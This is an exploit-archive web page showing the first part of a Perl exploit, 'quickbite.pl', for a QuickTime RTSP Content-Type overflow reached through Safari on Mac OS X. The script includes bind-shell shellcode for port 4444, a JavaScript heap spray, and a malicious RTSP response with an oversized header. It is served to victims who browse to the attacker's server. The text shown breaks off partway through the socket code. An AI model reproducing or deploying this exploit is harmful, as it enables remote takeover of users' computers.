Safari + Quicktime - Exploit - hacking technology

Safari + Quicktime

Add date: 07/08/2008 Publishing date: 07/08/2008 Hits: 282

Total 2 pages, Current page:1, Jump to page:

#!/usr/bin/perl
#
# quickbite.pl
#
# Safari + Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethnical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".

use Socket;
use IO::Handle;
use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
$buf = chr(0x11) x 6000;

# don't touch anything below this line
$html = <<ENDHTML;
<script>
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
var url = "rtsp://" + location.host + "/x.mp3";
document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
</script>
ENDHTML

$rtsp_body =
"v=0\r\n" .
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
"s=MPEG-1 or 2 Audio\r\n" .
"i=1.mp3\r\n" .
"t=0 0\r\n" .
"a=tool:hello\r\n" .
"a=type:broadcast\r\n" .
"a=control:*\r\n" .
"a=range:npt=0-213.077\r\n" .
"a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
"a=x-qt-text-inf:1.mp3\r\n" .
"m=audio 0 RTP/AVP 14\r\n" .
"c=IN IP4 0.0.0.0\r\n" .
"a=control:track1\r\n";
$content_length = length($rtsp_body);
$rtsp_header =
"RTSP/1.0 200 OK\r\n" .
"CSeq: 1\r\n" .
"Date: 0x00 :P\r\n" .
"Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
"Content-Type: $buf\r\n" .
"Content-Length: $content_length\r\n\r\n";
$rtsp = $rtsp_header . $rtsp_body;
$http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";
$| = 1;

my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port,INADDR_ANY);

Other pages: : 1 * 2 * Next>>

Next:CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit

Comment:

Category: Home > Exploit